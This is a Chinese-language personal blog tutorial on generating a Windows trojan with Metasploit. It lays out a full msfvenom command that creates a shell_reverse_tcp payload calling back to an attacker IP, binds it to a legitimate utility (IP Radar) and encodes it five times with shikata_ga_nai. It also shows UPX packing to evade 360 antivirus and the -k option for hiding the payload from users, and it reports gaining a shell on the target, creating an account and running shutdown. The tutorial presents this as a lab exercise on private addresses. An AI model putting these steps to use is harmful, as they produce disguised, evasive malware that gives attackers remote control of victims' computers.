原創博客,轉載請注出處!
我的公眾號,正在建設中,歡迎關注:
Meatsploit介紹
2018/01/03 更新
Metasploit是一款優秀的開源(!= 完全免費)滲透測試框架平台,在該平台下可以方便的實施滲透測試,Meatsploit具有繁多的接口、模塊等等,甚至允許用戶自己編寫自己的模塊使用。在Metasploit框架下可以方便的實現木馬的生成、捆綁、免殺。實驗樓網站存在此節課程但是是收費的,How frustrating,,,,so,,,,,:)
0X01選擇攻擊載荷
首先,開啟終端,鍵入:“msfconsole“,進入metasploit控制台。
鍵入“show payloads",查看所有可用的攻擊載荷的信息。
下面列出的載荷信息是所有可以使用的攻擊載荷
我使用的載荷名為:shell_reverse_tcp,是一個簡單的反彈shell程序,功能是連接肉雞(系統為windows系統)的命令行。當然也可以使用其它的攻擊載荷,實現不同的功能。
0X02選擇被捆綁文件
本實驗的實現的功能之一就是讓木馬捆綁在一個其它的可執行文件上,以便於木馬的感染和傳播。其實Meatsploit自帶有程序模板,其位置在data/templates/template.exe。雖然這個模板經常會更新,但是其仍是各大反病毒木馬廠商的關注重點。為了更好地實現免殺,我自己選擇一個待捆綁程序。我選擇的程序模板是”IP雷達“,IP雷達是一款常用且優秀的系統資源監控程序。(關於被捆綁程序的選擇是隨機的,侵刪)
下圖中qqwry.dat是IP雷達的IP地址庫,與本實驗無關。
0X03關於免殺
免殺是一門非常重要的技術(其它技術也很重要),我想一個真正的Hacker不會僅僅滿足於使用別人的軟件來進行免殺。自己寫的殼再怎么低級也比直接從網上找到的加殼工具安全的多。常見的免殺方式有:修改特征碼/修改程序入口點/花指令/加殼等等。(關於免殺推薦《黑客免殺攻防》——任曉琿,本書堪稱入門/提升的經典之作,該書作者前是邪惡八進制的一員哦:))
回歸正題,在Meatsploit框架下免殺的方式之一就是使用MSF編碼器。其功能是對我們攻擊載荷文件進行重新的排列編碼,改變可執行文件中的代碼形狀,避免被殺軟認出。可以在終端鍵入msfvenom -l encoders來查看所有的可用的編碼方式。注意並不是所有的編碼方式都在windows系統上可用!!!
再次提醒:注意並不是所有的編碼方式都在windows系統上可用!!!這里我選擇的編碼方式是:
0X04木馬的生成/捆綁/免殺
實驗環境:
攻擊機IP:192.168.159.134 系統:Kali linux
靶機IP:192.168.159.1 系統:win7(安全軟件為:360、COMODO )
生成木馬/捆綁/免殺操作如下:
msfvenom -p windows/shell_reverse_tcp 意為使用shell_reverse_tcp攻擊載荷
LHOST=192.168.159.134 此步是設置攻擊者IP地址
LPORT=8080 此步是設置木馬將會主動連接攻擊者設定的監聽端口
-e x86/shikata_ga_nai 此步意為使用shikata_ga_nai的編碼方式對攻擊載荷進行重新編碼,上文有講
-x IPradar5.exe 此步意為將木馬捆綁在指定的可執行程序模版上,此處為IPradar5.exe
-i 5 此處意為使用剛才設定的編碼方式對目標進行5次編碼(多次編碼理論上來講有助於免殺,但是也不一定,畢竟殺軟不是白收費的,免殺技術飛速發展,新的免殺技術一出現就會被各大安全廠商盯上的。。。。)
-f exe 此步意為指定MSF編碼器輸出格式為exe
-o /root/Desktop/backdoor.exe 此步意為指定處理完畢后的文件輸出路徑
至此木馬程序生成/捆綁/免殺就都完成了,,,,,,四不四很簡單。。。。趕腳完全木有技術含量的說。。。。
下面測試:
先設置msf,將其設置為監聽8080,等待木馬的鏈接
。。。。。。。。
這就尷尬了。。。。
並不甘心。。。。再對剛才的程序進行加殼處理
終端鍵入upx,參看upx加殼軟件參數
鍵入命令:upx -5 backdoor.exe 即對backdoor.exe進行加殼(此處為壓縮處理),加殼的不便之處就是會改變源文件的大小,有經驗的安全人員很容易發現這點差別。。。。重命名為1backdoor.exe
重新使用360掃描
結果狠尷尬。。。。
360的反木馬引擎看來還是不錯的。。。。。
將加殼后的文件上傳viscan進行雲查殺
可見公開的免殺工具並不是那么的靠譜,而且我發現在viscan的殺毒引擎中,奇虎360的引擎版本才是1.0.1,,,可見安全公司並不是白吃干飯的額。。。。
還有一點說明一下,以上對木馬的生成綁定操作,執行含有木馬的宿主程序時,宿主程序並不會啟動,如果想隱蔽木馬文件讓用戶察覺不出來宿主程序有問題的話,則要在生成木馬的那段代碼中添加 -k 選項,此意為攻擊載荷會在一個獨立的進程中啟動而源宿主程序的運行不受影響。
++++++++++++++++++++++++++++++++++++++我是分割線++++++++++++++++++++++++++++++++++++++++++++++++++++
2018/01/03 更新
之前的實驗是無線環境下進行操作,一直沒能實現獲取目標機的shell,現使用有線連接,成功獲取了shell。
截圖如下:
目標機:
從上圖可以看到成功在肉雞上創建了賬戶,下面測試下關機命令
實驗免殺還是未能繞過360安全衛士,待有時間再實驗。
我的公眾號,正在建設中,歡迎關注:
實驗到此結束